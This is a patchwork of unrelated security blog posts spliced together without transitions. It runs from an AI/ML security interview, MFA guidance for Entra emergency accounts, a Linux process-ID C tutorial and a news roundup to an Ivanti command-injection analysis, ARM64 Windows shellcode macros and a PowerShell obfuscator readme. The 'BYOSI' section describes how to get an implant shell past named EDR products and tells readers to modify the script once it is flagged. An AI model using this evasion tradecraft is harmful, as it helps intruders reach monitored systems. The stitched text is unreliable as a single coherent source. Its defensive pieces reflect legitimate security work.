At DEF CON, Michael Brown, Principal Security Engineer at Trail of Bits, sat down with Michael Novinson from Information Security Media Group (ISMG) to discuss four critical areas where AI/ML is revolutionizing security. Here’s what they covered:
AI/ML techniques surpass the limits of traditional software analysis
As Moore’s law slows down after 20 years of increasing computational power, traditional methods for finding, analyzing, and patching bugs yield diminishing returns. However, cloud computing and GPUs enable a new class of AI/ML systems that aren’t as constrained as conventional methods. By pivoting to AI/ML or a combination of AI/ML and traditional approaches, we can make new breakthroughs.
Leverage AI/ML to solve complex security problems
When solving computing problems using conventional methods, we use a prescriptive approach—we feed the system an algorithm that then produces a solution. In contrast, AI/ML systems are descriptive; we feed them numerous examples of what is right and wrong, and they learn to solve problems through their own modeling algorithms. This is beneficial in areas where we rely on highly specialized security engineers to solve complex, 'fuzzy' problems, because now AI/ML can step in. This is crucial as more complex problems are on the rise, yet there isn't enough specialized expertise to address them all, and traditional methods fall short.
Securing AI/ML systems is different than securing traditional systems
Engineers at Trail of Bits have been researching ML vulnerabilities, both data- and deployment-born, and have discovered that the vulnerabilities affecting AI/ML systems differ significantly from those in traditional software. So to secure AI/ML, we need distinct methods to avoid missing large parts of the attack surface. Therefore, it’s crucial to acknowledge these differences, treat them as such, and harden AI/ML systems early in their development to prevent costly, persistent flaws—avoiding the unnecessary mistakes that plagued early iterations of Web 2.0, mobile apps, and blockchain.
DARPA-funded projects, like AIxCC, apply AI/ML to traditional cyber issues
DARPA's AI Cyber Challenge (AIxCC) challenges teams to develop AI/ML systems that address conventional security problems. Our team's submission, Buttercup, is one of seven finalists advancing to next year's AIxCC finals, where it will compete on its ability to autonomously detect and patch vulnerabilities in real-world software.
Trail of Bits is at the forefront of integrating AI and ML into cybersecurity practices. Through our involvement in initiatives like the AI Cyber Challenge, we are addressing today’s security challenges while shaping the future of cybersecurity.
Reach out to us to learn more: www.trailofbits.com/contact
Evade EDRs the simple way: by not touching any of the APIs they hook.
Theory
I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit.
Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible.
Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering any EDR detections. EDRs typically overlook script files, focusing instead on binaries for implant delivery. They're configured to detect high entropy or suspicious sections in binaries, not simple scripts.
This attack method capitalizes on that oversight for significant profit. The PowerShell script's steps mirror what a developer might do when first entering an environment. Remarkably, just four lines of PowerShell code completely evade EDR detection, with Defender/AMSI also blind to it. Adding to the effectiveness, GitHub serves as a trusted deployer.
What this script does
The PowerShell script achieves EDR/AV evasion through four simple steps (technically 3):
1. It fetches the PHP archive for Windows and extracts it into a new directory named 'php' within 'C:\Temp'.
2. The script then acquires the implant PHP script or shell, saving it in the same 'C:\Temp\php' directory.
3. Finally, it executes the implant or shell using the whitelisted PHP binary (which exempts it from most restrictions that would otherwise prevent it from running in the first place).
With these actions completed, congratulations: you now have an active shell on a CrowdStrike-monitored system. What's particularly amusing is that, if my memory serves me correctly, SentinelOne is unable to scan PHP file types. So, feel free to let your imagination run wild.
Disclaimer.
I am in no way responsible for the misuse of this. This issue is a major blind spot in EDR protection; I am only bringing it to everyone's attention.
Thanks Section
A big thanks to @im4x5yn74x for affectionately giving this method the name BYOSI, and for helping set up the test environment that brought it to life.
Edit
It appears that MS Defender is now flagging the PHP script as malicious, but it still allows the PowerShell script full execution. So, modify the PHP script.
Edit
Hello, SentinelOne :) You might want to make sure that you are making links, not embeds.
Update your emergency accounts before October 15th.
Even if you have been out of the office for the last couple of months, you should be aware that starting October 15th you will need to provide Multi-Factor Authentication (MFA) to log on to the Azure portal, the Entra admin center, and the Intune admin center. This will be enforced for all users accessing these resources, regardless of their role or permission level.
Two types of accounts are notably affected by this enforcement:
Emergency “Break the Glass” accounts.
Non-personal accounts (NPA), meaning regular user accounts used by services or applications.
The latter will most likely be affected at the beginning of 2025. That is why this article focuses on emergency accounts.
What are emergency accounts?
Microsoft recommends that you set up one or two directly assigned emergency accounts in case you lose access to your tenant for whatever reason. In general, these are the characteristics of emergency accounts:
Cloud-only accounts which do not have dependencies on on-premises services. It is customary to use the *.onmicrosoft.com domain for these accounts.
Directly assigned to the Global Administrator role.
Excluded from almost all conditional access policies.*
Not assigned to one individual.
Have a minimal number of dependencies, including on the MFA service.
In practice, this was usually achieved by creating an account with a long password that was split into pieces and given to different people in the organisation; no MFA was configured or required for these accounts.
With Microsoft’s new MFA enforcement, you need a different approach for emergency accounts.
* We recommend creating specific conditional access policies for emergency accounts to compensate for the exclusions.
You need to enable MFA for emergency accounts by October 15th
In practice, you can choose any MFA method supported by Entra ID for your emergency accounts. But now that you are forced to do it, why not pick a long-term solution?
Phishing-resistant MFA methods are the best solution for securing your emergency accounts while still being able to use them in case of an (ahem) emergency. Rather than eliminating MFA methods one by one, I will appeal to the risk-based approach: if you have an account with direct Global Administrator access, you should protect it accordingly.
Of the three phishing-resistant methods currently supported by Entra ID, we recommend FIDO2-compliant keys. The reasons for this recommendation:
Microsoft Authenticator (as a sign-in method) and Windows Hello for Business are linked to a specific device that will need to be maintained and updated; and even if such devices fit in a safe, how will they remain charged?
Certificate authentication needs an infrastructure for the trust chain, which represents an additional dependency.
FIDO2 hardware keys are the most cost-efficient solution to protect your emergency accounts.
While you are at it, why not deploy FIDO2 keys for all your administrators?
There are plenty of supported FIDO2-compliant keys available that you can use with Entra ID. Some of them require a PIN or passphrase to activate the cryptographic functions; some are unlocked by biometrics. This is referred to as "a gesture" that activates the key, and it varies from one vendor to another.
Be aware that, even though Entra ID now supports device-bound FIDO2 passkeys, this approach is similar to using a smartphone or Windows device: the device will need to be maintained and kept updated so it can be used for emergency access when required, and it is therefore not recommended.
Suggested approach
In the times when a long shared password was used, there was a group of people within the organization, the Quorum, who held the pieces of the password. This Quorum was normally composed of members of the C-suite, IT, and security management. A sub-group of these members was required to get access to the emergency accounts, to mitigate the possibility of misuse.
Today, we would leverage the possibility to register multiple FIDO2 keys for one emergency account. These keys should be kept securely (in a safe, for example) and in such a way that prevents one individual from accessing them alone.
There are two viable options:
Two individuals split the combination to one physical safe that holds one FIDO2 key. Both (or even a third person) hold the “gesture” to activate the key.
One individual knows the combination of the physical safe and another knows the PIN for the FIDO2 key or has the fingerprint to activate it.
Either option will provide separation of duties. There are many possible deviations from those options, but keep in mind not to place all the responsibility in one person only.
Replicating the setup in another geography or region will also provide redundancy in case of a localized emergency (e.g., the physical safe being inaccessible, a faulty FIDO2 key, etc.).
You can decide whether you prefer to create only one emergency account with several FIDO2 keys assigned to it, or to create separate accounts for each location.
Ensure you register more than one FIDO2 key to each emergency account you create. It is even better to use different hardware providers, to be prepared for situations like the recently discovered YubiKey vulnerability.
Pros and Cons
The most obvious inconvenience of the suggested approach is the dependence on a physical key for emergency access. But you should register more than one key for each account, preferably from two different vendors.
One of the advantages is the reduced number of required emergency accounts. In the past, depending on the type of Quorum, you would need to set up two or more accounts.
With this new approach, you can easily have only one emergency account with different keys spread in several places. Furthermore, this can be a passwordless account. In fact, it should be!
The main reason to create more accounts relates to administrative and monitoring purposes. Would you prefer to use one account per region, or only one account and monitor the IP originating the login event?
Normally, Microsoft recommends excluding at least one emergency account from conditional access policies. However, since we now know from what specific location these will be used, we can add that information to the conditional access policies aimed for emergency accounts to prevent misuse.
Creating or updating the accounts
These accounts were regularly created during “Quorum” ceremonies where the password was created jointly to ensure no one knew the whole password.
A similar approach can be used today to update them and register the FIDO2 key or keys that will be used to protect the digital identity. Bring in the members of your Quorum and follow how these keys are being registered. As part of the registration process, members should provide the “gestures” to activate the keys: PINs, biometrics or others. In this way, enough transparency will be built into the process.
Make sure you test your accounts in this setting before storing the FIDO2 keys in their safes. This is also the opportunity to test your monitoring and alerting capabilities as described below.
In fact, you should regularly test the whole procedure as part of your incident readiness exercises. And if any of the persons who hold PINs, safe combinations, or any other information related to the emergency accounts leaves the company or switches roles, you should make the necessary adjustments and take the opportunity to test for functioning access. We recommend conducting this review at least twice per year.
Monitoring
The original recommendation included setting up alerts on any login attempt using these accounts. With the recent requirement, you should also add alerts for when authentication methods (MFA) are added to the account, or when sensitive activities are conducted by any of the emergency accounts.
You should only expect those alerts to be triggered when you are updating your accounts (i.e., adding new FIDO2 keys), testing them, or using them in a real emergency situation.
Bear in mind that these alerts can take some time to arrive. In our experience, there is a gap of five minutes between a successful logon and the alert message.
Conclusion
The clock is ticking! You should update your emergency accounts now, assuming your human administrators are already using (phishing-resistant) MFA.
FIDO2 keys are the most affordable and effective solution to do so. Paired with a sound governance process, you should be able to face the upcoming MFA enforcement without problem.
Don't forget that non-personal accounts are next: Azure CLI and PowerShell are scheduled to require MFA in early 2025. This will potentially have a higher impact, since some organizations still use "user" accounts for service or programmatic access to Entra ID and Azure.
Prepare for this upcoming requirement by identifying all of those accounts; you can leverage MFA Insights in Entra ID to identify them. Once identified, you can lay out a plan to migrate them as required (to a managed identity or service principal).
Victor is the solution lead for Cloud Security Engineering at NVISO. He has experience in hybrid environments with a focus on Identity and Access Management, network security and IT infrastructure.
Hello, cybersecurity enthusiasts and white hackers!
I promised to shed light on programming rootkits and other interesting and evil things when programming malware for Linux, but before we start, let's try to do simple things. Some of my readers have no idea how to perform, for example, code injection into Linux processes.
Those who have been reading me for a very long time will remember a similarly interesting and simple example of finding a process identifier on Windows for injection purposes.
practical example
Let’s implement similar logic for Linux. Everything is very simple:
/*
* hack.c
* linux hacking part 2:
* find process ID by name
* author @cocomelonc
* https://cocomelonc.github.io/linux/2024/09/16/linux-hacking-2.html
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <ctype.h>

int find_process_by_name(const char *proc_name) {
  DIR *dir;
  struct dirent *entry;
  int pid = -1;

  dir = opendir("/proc");
  if (dir == NULL) {
    perror("opendir /proc failed");
    return -1;
  }

  while ((entry = readdir(dir)) != NULL) {
    if (isdigit(*entry->d_name)) {
      char path[512];
      snprintf(path, sizeof(path), "/proc/%s/comm", entry->d_name);
      FILE *fp = fopen(path, "r");
      if (fp) {
        char comm[512];
        if (fgets(comm, sizeof(comm), fp) != NULL) {
          // remove trailing newline from comm
          comm[strcspn(comm, "\r\n")] = 0;
          if (strcmp(comm, proc_name) == 0) {
            pid = atoi(entry->d_name);
            fclose(fp);
            break;
          }
        }
        fclose(fp);
      }
    }
  }

  closedir(dir);
  return pid;
}

int main(int argc, char *argv[]) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <process_name>\n", argv[0]);
    return 1;
  }

  int pid = find_process_by_name(argv[1]);
  if (pid != -1) {
    printf("found pid: %d\n", pid);
  } else {
    printf("process '%s' not found.\n", argv[1]);
  }
  return 0;
}
My code demonstrates how to search for a running process by its name in Linux by scanning the /proc directory. It reads the process names stored in /proc/[pid]/comm, and if it finds a match, it retrieves the process ID (PID) of the target process.
As you can see, there are only two functions here. First of all, we implemented the find_process_by_name function. This function is responsible for searching for the process by name within the /proc directory.
It takes a process name (proc_name) as input and returns the PID of the found process or -1 if the process is not found.
The function uses the opendir() function to open the /proc directory. This directory contains information about running processes, with each subdirectory named after a process ID (PID).
Then, iterate through entries in /proc:
while ((entry = readdir(dir)) != NULL) {
the readdir() function is used to iterate through all entries in the /proc directory; each entry represents either a running process (if the entry name is a number) or other system files.
Then it checks whether the entry name represents a number (i.e., a process ID). Only directories named with digits are valid process directories in /proc:
if (isdigit(*entry->d_name)) {
Note that, the comm file inside each /proc/[pid] directory contains the name of the executable associated with that process:
That means we construct the full path to the comm file by combining /proc/, the process ID (d_name), and /comm.
Finally, we open comm file, read process name and compare it:
FILE *fp = fopen(path, "r");
if (fp) {
  char comm[512];
  if (fgets(comm, sizeof(comm), fp) != NULL) {
    // remove trailing newline from comm
    comm[strcspn(comm, "\r\n")] = 0;
    if (strcmp(comm, proc_name) == 0) {
      pid = atoi(entry->d_name);
      fclose(fp);
      break;
    }
  }
Then, of course, close the directory and return.
The second function is the main function:
int main(int argc, char *argv[]) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <process_name>\n", argv[0]);
    return 1;
  }

  int pid = find_process_by_name(argv[1]);
  if (pid != -1) {
    printf("found pid: %d\n", pid);
  } else {
    printf("process '%s' not found.\n", argv[1]);
  }
  return 0;
}
It just checks the command-line arguments and runs the process-finding logic.
demo
Let’s check everything in action. Compile it:
gcc -z execstack hack.c -o hack
Then run it on a Linux machine:
./hack [process_name]
As you can see, everything worked perfectly. We found Telegram's PID (75678 in my case)! =^..^=
It all seems very easy, doesn’t it?
But there is a caveat. If we try to run it for processes like firefox in my example:
./hack firefox
we get:
The issue we’re facing may stem from the fact that some processes, like firefox, might spawn child processes or multiple threads, which might not all use the comm file to store their process name.
The /proc/[pid]/comm file stores the executable name without the full path and may not reflect all instances of the process, especially if there are multiple threads or subprocesses under the same parent.
So possible issues in my opinion are:
different process names in /proc/[pid]/comm: child processes or threads could use different naming conventions or might not be listed under /proc/[pid]/comm as firefox.
zombies or orphan processes: some processes might not show up correctly if they are in a zombie or orphaned state.
practical example 2
Instead of reading the comm file, we can check the /proc/[pid]/cmdline file, which contains the full command used to start the process (including the process name, full path, and arguments). This file is more reliable for processes that spawn multiple instances like firefox.
For this reason I just created another version (hack2.c):
/*
* hack2.c
* linux hacking part 2:
* find processes ID by name
* author @cocomelonc
* https://cocomelonc.github.io/linux/2024/09/16/linux-hacking-2.html
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <ctype.h>

void find_processes_by_name(const char *proc_name) {
  DIR *dir;
  struct dirent *entry;
  int found = 0;

  dir = opendir("/proc");
  if (dir == NULL) {
    perror("opendir /proc failed");
    return;
  }

  while ((entry = readdir(dir)) != NULL) {
    if (isdigit(*entry->d_name)) {
      char path[512];
      snprintf(path, sizeof(path), "/proc/%s/cmdline", entry->d_name);
      FILE *fp = fopen(path, "r");
      if (fp) {
        char cmdline[512];
        if (fgets(cmdline, sizeof(cmdline), fp) != NULL) {
          // command line arguments are separated by '\0',
          // we only need the first argument (the program name)
          cmdline[strcspn(cmdline, "\0")] = 0;
          // perform case-insensitive comparison of the base process name
          const char *base_name = strrchr(cmdline, '/');
          base_name = base_name ? base_name + 1 : cmdline;
          if (strcasecmp(base_name, proc_name) == 0) {
            printf("found process: %s with PID: %s\n", base_name, entry->d_name);
            found = 1;
          }
        }
        fclose(fp);
      }
    }
  }

  if (!found) {
    printf("no processes found with the name '%s'.\n", proc_name);
  }
  closedir(dir);
}

int main(int argc, char *argv[]) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <process_name>\n", argv[0]);
    return 1;
  }

  find_processes_by_name(argv[1]);
  return 0;
}
As you can see, this is an updated version of the code that reads from /proc/[pid]/cmdline instead.
But the file /proc/[pid]/cmdline or /proc/[pid]/status may not always show all subprocesses or threads correctly.
demo 2
Let's check the second example in action. Compile it:
gcc -z execstack hack2.c -o hack2
Then run it on a Linux machine:
./hack2 [process_name]
As you can see, it’s correct.
I hope this post and its practical examples are useful for malware researchers, Linux programmers, and everyone interested in Linux kernel programming and code injection techniques.
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-09-09 to 2024-09-16.
News
Activation Lock for iPhone components - iOS 18 will lock replaceable components of an iPhone to the iCloud account, making the steal-and-part-out pipeline much more difficult. Thieves would have to phish the phone's original owner, or defeat the activation lock on each component when parting out the phone. Apple is making iPhones less attractive to steal with each release.
Bug Left Some Windows PCs Dangerously Unpatched - "Build version numbers crossed into a range that triggered a code defect." The build system for Windows and Windows Updates must be a wild place.
We Spent $20 To Achieve RCE And Accidentally Became The Admins Of .MOBI - This is worth a careful read. An expired domain leads to complete chaos, from RCE to TLS certificates for any .mobi domain. A post that makes you wonder how we've gotten this far with the underlying infrastructure of the internet.
Defend Against Vampires With 10 Gbps Network Encryption - If your fiber transits uncontrolled spaces (or even if it doesn't), you can use WireGuard and Linux routers on either end to encrypt all trunk'd VLAN traffic with almost no overhead when tuned properly.
Microsoft Windows MSI Installer - Repair to SYSTEM - A detailed journey - Until the September 2024 Patch Tuesday, you could use some Windows MSI installers to escalate to SYSTEM during a "repair." SEC Consult released msiscan, a scanning tool for identifying local privilege escalation issues in vulnerable MSI installers, along with a few Yara rules in the post.
Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation - "In this blog I'll introduce SQL Server credential objects and discuss how they can be abused by threat actors to execute code as either a SQL Server login, local Windows user, or Domain user. I'll also cover how to enable logging that can be used to detect the associated behavior. This should be interesting to penetration testers, red teamers, and DBAs looking for legitimate authentication work arounds."
Living off the land, GPO style - "The ability to edit Group Policy Object (GPOs) from non-domain joined computers using the native Group Policy editor has been on my list for a long time. This blog post takes a deep dive into what steps were taken to find out why domain joined machines are needed in the first place and what options we had to trick the Group Policy Manager MMC snap-in into believing the computer was domain joined."
DGPOEdit - Disconnected GPO Editor - A Group Policy Manager launcher to allow editing of domain GPOs from non-domain joined machines.
BEAR - Bear C2 is a compilation of C2 scripts, payloads, and stagers used in simulated attacks by Russian APT groups. Bear features a variety of encryption methods, including AES, XOR, DES, TLS, RC4, RSA, and ChaCha, to secure communication between the payload and the operator machine.
EXE-or-DLL-or-ShellCode - Just a simple, silly PoC demonstrating an executable "exe" file that can be used as an exe, dll, or shellcode...
alpt4ats - A Lazy Programmer's Tips for Avoiding the SOC ~ BSides Belfast 2024.
New to Me and Miscellaneous
This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!
Today on Cyber Work Hacks, my guest, Infosec Skills author Cicero Chimbanda, gives us another Hack for our Cybersecurity Managers. If you want to know more about Cicero’s Security Manager learning path for Infosec Skills, this is the episode for you, as we break down everything you’ll learn and how to apply it to your career!
0:00 - Infosec's security manager soft skills course
2:39 - Infosec Skills soft skills learning modules
5:30 - Why cybersecurity management soft skills are important
7:30 - Benefits from learning cybersecurity soft skills
10:52 - Outro
About Infosec Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
On September 10, 2024, Ivanti released a security advisory for a command injection vulnerability in its Cloud Service Appliance (CSA) product. Initially, CVE-2024-8190 seemed uninteresting to us, given that Ivanti stated it was an authenticated vulnerability. Shortly after, on September 13, 2024, the vulnerability was added to CISA's Known Exploited Vulnerabilities (KEV) catalog. Given that it was now exploited in the wild, we decided to take a look.
The advisory reads:
Ivanti has released a security update for Ivanti CSA 4.6 which addresses a high severity vulnerability. Successful exploitation could lead to unauthorized access to the device running the CSA. Dual-homed CSA configurations with ETH-0 as an internal network, as recommended by Ivanti, are at a significantly reduced risk of exploitation.
An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.
The description definitely suggests the opportunity for accidental exposure, given the details around misconfiguration of the external versus internal interfaces.
Cracking It Open
Inspecting the patches, we find that the Cloud Service Appliance has a PHP frontend and the patch simply copies in newer PHP files.
Inspecting the four new PHP files, we land on DateTimeTab.php, which has more interesting changes related to validation of the zone variable right before a call to exec().
Figure 2. Validating the zone variable
Now that we have a function of interest, we trace execution to it. We find that handleDateTimeSubmit() calls our vulnerable function on line 153.
We see that the function takes the request argument TIMEZONE and passes it directly to the vulnerable function, which previously performed no input validation before calling exec() with our input formatted into the command string.
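To make that concrete, here is a rough, hypothetical sketch (in PHP) of the kind of validation the patch introduces; the variable name, command, and validation source below are illustrative assumptions, not Ivanti's actual code:

// hypothetical illustration only, not Ivanti's code: validate the submitted
// zone against PHP's own list of timezone identifiers before it can ever
// reach a shell command
$zone = $_POST['TIMEZONE'] ?? '';
if (!in_array($zone, timezone_identifiers_list(), true)) {
    die('invalid timezone');
}
exec('timedatectl set-timezone ' . escapeshellarg($zone));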
Developing the Exploit
We find that the PHP endpoint /datetime.php maps to the handleDateTimeSubmit() function, and is accessible only from the “internal” interface with authentication.
Putting together the pieces, we’re able to achieve command injection by supplying the application username and password. Our proof of concept can be found here.
N-Day Research – also known as CVSS Quality Assurance
It seems that Ivanti is correct in marking this as an authenticated vulnerability. But let's take a look at their configuration guidance to understand what may have gone wrong for some of the clients being exploited in the wild.
Ivanti’s guidance about ensuring that eth0 is configured as the internal network interface tracks with what we’ve found. When attempting to reach the administrative portal from eth1, we find that we receive a 403 Forbidden instead of a 401 Unauthorized.
Users that accidentally swap the interfaces, or simply only have one interface configured, would expose the console to the internet.
If exposed to the internet, we found that there was no form of rate limiting on attempts of username and password combinations. While the appliance does ship with a default credential of admin:admin, this credential is forcibly updated to a stronger, user-supplied password upon first login.
We theorize that the users who were exploited most likely had never logged in to the appliance, or, due to the lack of rate limiting, had poor password hygiene and weaker passwords.
Indicators of Compromise
We found sparse logs, but in /var/log/messages we saw that an incorrect login looked like the following messages – specifically, key in on "User admin does not authenticate".
Back in October 2018, I wanted to write ARM assembly on Windows. All I could acquire then was a Surface tablet running Windows RT that was released sometime in October 2012. Windows RT (now deprecated) was a version of Windows 8 designed to run on the 32-Bit ARMv7 architecture. By the summer of 2013, it was considered to be a commercial flop.
For developers, it was possible to compile binaries on a separate machine and get them running on the tablet via USB stick or network, but unless you wanted to obtain a developer license, a jailbreak exploit was required. Since there were too many limitations, my attention shifted towards Linux on a Raspberry Pi4.
From what I read, the release of Windows 10 for ARMv7 in 2015 was a distinct improvement over Windows RT. Limitations for developers persisted but at least Microsoft provided support for emulating x86 applications. Today, I finally have an ARM64 device running Windows 11 without all the problems that plagued previous versions. There’s full native support for developers with Visual Studio 2022 and a Linux subsystem that can run Ubuntu or Debian if you want to program ARM64 applications for Linux. (I know WSL isn’t new, but still). Best of all perhaps is the ability to emulate both 32-bit and 64-bit applications for the x86 architecture.
Toolchain
To support Windows on ARM, you have at least three options:
MSVC and LLVM-MinGW are best for C/C++. I prefer the GNU Assembler (as) over the ARM Macro Assembler (armasm64) shipped by Microsoft, but the main problem with both is the lack of support for macros. armasm64 supports most of the directives documented by ARM but appears to have limitations. From what I can tell, ARMASM has no support for structures, making it very difficult to write programs in assembly. This is also a problem with the GNU Assembler, and the only way around it is to use symbolic names with the hardcoded offset of each field.
There is some hope. Despite having no direct support for the ARM architecture, flat assembler g (FASMG) by Tomasz Grysztar is an adaptable assembly engine that "has the ability to become an assembler for any CPU architecture." There are include files for fasmg that implement ARM64 instructions using macros, and that's what I decided to use for a simple PoC in this post.
Once you set up FASMG, copy the AARCH64 macros from asmFish to the include directory. My own batch file that I execute from a command prompt inside the root directory of fasm looks like this:
@echo off
set include=C:\fasmw\fasmg\packages\utility;C:\fasmw\fasmg\packages\x86\include
set path=%PATH%;C:\fasmw\fasmg\core
Windows uses the same calling convention as Linux for subroutines. However, the invocation of system calls is different: Linux uses x8 to hold the system call ID, whereas Windows embeds the ID in the SVC instruction.
Register    Volatile?   Role
x0          Yes         Parameter/scratch register 1, result register
x1-x7       Yes         Parameter/scratch registers 2-8
x8-x15      Yes         Scratch registers; also used as parameters
x16-x17     Yes         Intra-procedure-call scratch registers
x18         No          Platform register: in kernel mode, points to KPCR for the current processor; in user mode, points to TEB
x19-x28     No          Scratch registers
x29/fp      No          Frame pointer
x30/lr      No          Link register
x31/xzr     No          Zero register
Hello, World! (Console)
Initially, I started working with ARMASM, so the following is just an example of how to create a simple console application.
; armasm64 hello.asm -ohello.obj
; cl hello.obj /link /subsystem:console /entry:start kernel32.lib
AREA .drectve, DRECTVE
; invoke API without repeating the same instructions
; p1 should be the number of register available to load address of API
MACRO
INVOKE $p1, $p2 ; name of macro followed by number of parameters
adrp $p1, __imp_$p2
ldr $p1,[$p1, __imp_$p2]
blr $p1
MEND
; saves time typing "__imp_" for each API imported
MACRO
IMPORT_API $p1
IMPORT __imp_$p1
MEND
AREA data,DATA
Text DCB "Hello, World!\n"

; symbolic constants for clarity
NULL equ 0
STD_OUTPUT_HANDLE equ -11

; the entrypoint
EXPORT start
; the API used
IMPORT_API ExitProcess
IMPORT_API WriteFile
IMPORT_API GetStdHandle
; start of code to execute
AREA text,CODE
start PROC
mov x0, STD_OUTPUT_HANDLE
INVOKE x1, GetStdHandle
mov x4, NULL
mov x3, NULL
mov x2, 14  ; string length...
adr x1,Text
INVOKE x5, WriteFile
mov x0, NULL
INVOKE x1, ExitProcess
ENDP
END
And a simple GUI. A version for FASMG can be found here.
Hello, World! (GUI)
; armasm64 msgbox.asm -omsgbox.obj
; cl msgbox.obj /link /subsystem:windows /entry:start kernel32.lib user32.lib
AREA .drectve, DRECTVE
; invoke API without repeating the same instructions
; p1 should be the free register available to load address of API
MACRO
INVOKE $p1, $p2
adrp $p1, __imp_$p2
ldr $p1,[$p1, __imp_$p2]
blr $p1
MEND
; saves time typing "__imp_" for each API imported
MACRO
IMPORT_API $p1
IMPORT __imp_$p1
MEND
AREA data,DATA
Text DCB "Hello, World!",0x0
Caption DCB "Hello from ARM64",0x0

; symbolic names for clarity
NULL equ 0

; the entrypoint
EXPORT start
; the API used
IMPORT_API ExitProcess
IMPORT_API MessageBoxA
; start of code to execute
AREA text,CODE
start PROC
mov x3, NULL
adr x2,Caption
adr x1,Text
mov x0,NULL
INVOKE x4, MessageBoxA
mov x0, NULL
INVOKE x1, ExitProcess
ENDP
END
The shellcode uses the IStream object to read data from the HTTP request. FASMG provides macros to declare an interface. There are also comcall and cominvk macros to invoke interface methods, but I decided not to use them here. As pointed out before in relation to executing .NET assemblies, interfaces are just structures with function pointers.
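A minimal C sketch of that idea, using the documented urlmon API against an example URL (illustrative only, not the shellcode itself): the first field of the object is a pointer to its vtable, and a method call is simply an explicit call through one of those function pointers.

#define COBJMACROS
#include <windows.h>
#include <urlmon.h>
#pragma comment(lib, "urlmon.lib")

int main(void) {
    IStream *stream = NULL;
    char buf[1024];
    ULONG read = 0;
    // URLOpenBlockingStreamA returns an IStream* for the response body
    if (URLOpenBlockingStreamA(NULL, "https://example.com/", &stream, 0, NULL) == S_OK) {
        // same as stream->Read(...) in C++: lpVtbl is the structure of function pointers
        stream->lpVtbl->Read(stream, buf, sizeof(buf), &read);
        stream->lpVtbl->Release(stream);
    }
    return 0;
}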
The most powerful feature of FASMG is its support for macros. It’s possible to implement cryptographic hashes like SHA256, SHA512 and SHA3 purely with macros. The following doesn’t demonstrate the full potential of FASMG at all.
macro hash_api dll_name, api_name
local dll_hash, api_hash, b
; DLL
virtual at 0
db dll_name
dll_hash = 0
repeat $
load b byte from % - 1
dll_hash = (dll_hash + b) and 0xFFFFFFFF
dll_hash = ((dll_hash shr 8) and 0xFFFFFFFF) or ((dll_hash shl 24) and 0xFFFFFFFF)
end repeat
end virtual
; API
virtual at 0
db api_name
api_hash = 0
repeat $
load b byte from % - 1
api_hash = (api_hash + b) and 0xFFFFFFFF
api_hash = ((api_hash shr 8) and 0xFFFFFFFF) or ((api_hash shl 24) and 0xFFFFFFFF)
end repeat
end virtual
dd (dll_hash + api_hash) and 0xFFFFFFFF
end macro
Thread Environment Block
xpr is an alias for the x18 register. As noted in the table of integer registers, it contains a pointer to the TEB for user-mode applications. Every offset used by AMD64 can probably be used for ARM64; however, it would be safer to check the debugging symbols.
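For example, a minimal sketch of reading the PEB pointer out of the TEB (0x60 is the documented ProcessEnvironmentBlock offset in the AMD64 TEB; as said above, verify it against symbols before relying on it for ARM64):

; illustrative only: x18 points to the TEB in user mode
ldr x0, [x18, 0x60]    ; assuming the AMD64 layout holds, x0 now contains the PEB address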
System Calls
For x86, the syscall number is placed in the accumulator (EAX/RAX), but for ARM64 it's embedded in the SVC opcode itself, and there appears to be no alternative (at least none that I'm aware of). Building a new stub would require using NtAllocateVirtualMemory and manually encoding the instruction.
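For reference, a hedged sketch of what such a stub looks like: the arguments are already in x0-x7, and the immediate of SVC is the service number, which changes between Windows builds, so the value below is only a placeholder.

; illustrative stub, not a real service number
my_syscall:
    svc 0xFFF    ; placeholder system call ID embedded in the instruction itself
    ret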
HTTP Download
The following code uses URLOpenBlockingStream to download a shellcode and execute in memory.
A tool, written in Go, for obfuscating PowerShell scripts. The main objective of this program is to obfuscate PowerShell code to make its analysis and detection more difficult. The tool offers 5 levels of obfuscation, from basic obfuscation to script fragmentation. This allows users to tailor the obfuscation level to their specific needs.
Usage: ./obfuscator -i <inputFile> -o <outputFile> -level <1|2|3|4|5>

Options:
  -i string
        Name of the PowerShell script file.
  -level int
        Obfuscation level (1 to 5). (default 1)
  -o string
        Name of the output file for the obfuscated script. (default "obfuscated.ps1")
Obfuscation levels:
  1: Basic obfuscation by splitting the script into individual characters.
  2: Base64 encoding of the script.
  3: Alternative Base64 encoding with a different PowerShell decoding method.
  4: Compression and Base64 encoding of the script will be decoded and decompressed at runtime.
  5: Fragmentation of the script into multiple parts and reconstruction at runtime.
Features:
Obfuscation Levels: Five levels of obfuscation, each more complex than the previous one.
Level 1: Obfuscation by splitting the script into individual characters.
Level 2: Base64 encoding of the script.
Level 3: Alternative Base64 encoding with a different PowerShell decoding method.
Level 4: Compression and Base64 encoding of the script will be decoded and decompressed at runtime.
Level 5: Fragmentation of the script into multiple parts and reconstruction at runtime.
Compression and Encoding: Level 4 includes script compression before encoding it in base64.
Variable Obfuscation: A function was added to obfuscate the names of variables in the PowerShell script.
Random String Generation: Random strings are generated for variable name obfuscation.
Install
go install github.com/TaurusOmar/psobf@latest
Example of Obfuscation Levels
